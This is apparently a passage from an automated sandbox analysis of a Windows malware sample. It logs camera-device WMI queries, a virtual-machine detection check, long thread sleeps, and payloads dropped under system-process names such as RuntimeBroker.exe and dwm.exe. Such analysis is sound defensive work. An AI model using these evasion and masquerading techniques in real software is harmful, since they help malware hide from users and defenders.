                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeMemory allocated: D30000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeMemory allocated: 1AD70000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeMemory allocated: C10000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeMemory allocated: 1A6C0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeMemory allocated: 7E0000 memory reserve | memory write watch
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeMemory allocated: 1A6A0000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeMemory allocated: A20000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeMemory allocated: 1A6F0000 memory reserve | memory write watch
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeMemory allocated: 1710000 memory reserve | memory write watch
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeMemory allocated: 1B100000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeMemory allocated: 1510000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeMemory allocated: 1B030000 memory reserve | memory write watch
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeMemory allocated: 30E0000 memory reserve | memory write watch
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeMemory allocated: 1B0E0000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeMemory allocated: 3020000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeMemory allocated: 1B1D0000 memory reserve | memory write watch
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeMemory allocated: 14D0000 memory reserve | memory write watch
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeMemory allocated: 1B090000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeMemory allocated: 1850000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeMemory allocated: 1B390000 memory reserve | memory write watch
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeMemory allocated: 13F0000 memory reserve | memory write watch
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeMemory allocated: 1AFA0000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeMemory allocated: B20000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeMemory allocated: 1A820000 memory reserve | memory write watch
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeMemory allocated: C60000 memory reserve | memory write watch
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeMemory allocated: 1A980000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeMemory allocated: 1380000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeMemory allocated: 1AFD0000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 600000Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 599875Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 599625Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 3600000Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 598984Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 598265Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 598047Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 597859Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 597609Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 597359Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 597000Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 596828Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 596562Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 596234Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 595625Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 595359Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 594953Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 594741Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 594500Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 594265Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 594105Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 593844Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 593469Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 593156Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 592812Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 592531Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 592219Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 591922Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 591047Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 590734Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 590477Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 590219Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 589828Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 589219Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 588484Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 588132Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 587875Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 587453Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 587094Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 586859Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 586359Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 585594Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 585156Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 584719Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 584365Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 583937Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 583672Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 583312Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 582844Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 582547Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 582235Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 581422Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 580719Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 580390Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 580094Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 579707Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 579359Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 578640Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 578250Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 577967Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 577719Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 577582Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 577454Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 577265Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 577056Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 576912Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 576703Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 576589Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 576312Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 300000Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 576072Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 575915Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 575787Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 575647Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 575523Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 575421Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 575303Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 575185Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 575071Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 574911Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 574781Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 574639Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 574529Jump to behavior
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWindow / User API: threadDelayed 7907Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWindow / User API: threadDelayed 1567Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeDropped PE file which has not been started: C:\Users\user\Desktop\oANPimHy.logJump to dropped file
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeDropped PE file which has not been started: C:\Users\user\Desktop\DVfmUYdt.logJump to dropped file
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeDropped PE file which has not been started: C:\Users\user\Desktop\LzHTfErB.logJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeDropped PE file which has not been started: C:\Users\user\Desktop\kDsGBTSe.logJump to dropped file
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeDropped PE file which has not been started: C:\Users\user\Desktop\dMjZyaMQ.logJump to dropped file
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeDropped PE file which has not been started: C:\Users\user\Desktop\umLWkwXM.logJump to dropped file
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeDropped PE file which has not been started: C:\Users\user\Desktop\bakRRaCx.logJump to dropped file
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeDropped PE file which has not been started: C:\Users\user\Desktop\vaQeWJTK.logJump to dropped file
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeDropped PE file which has not been started: C:\Users\user\Desktop\UiajPhxi.logJump to dropped file
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeDropped PE file which has not been started: C:\Users\user\Desktop\ksQGNTNC.logJump to dropped file
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 4360Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 7844Thread sleep time: -30000s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -600000s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -599875s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -599625s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8008Thread sleep time: -3600000s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -598984s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -598265s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -598047s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -597859s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -597609s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -597359s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -597000s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -596828s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -596562s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -596234s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -595625s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -595359s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -594953s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -594741s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -594500s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -594265s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -594105s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -593844s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -593469s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -593156s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -592812s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -592531s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -592219s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -591922s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -591047s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -590734s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -590477s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -590219s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -589828s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -589219s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -588484s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -588132s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -587875s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -587453s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -587094s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -586859s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -586359s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -585594s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -585156s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -584719s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -584365s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -583937s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -583672s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -583312s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -582844s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -582547s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -582235s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -581422s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -580719s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -580390s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -580094s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -579707s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -579359s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -578640s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -578250s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -577967s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -577719s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -577582s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -577454s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -577265s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -577056s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -576912s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -576703s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -576589s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -576312s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8008Thread sleep time: -300000s >= -30000sJump to behavior
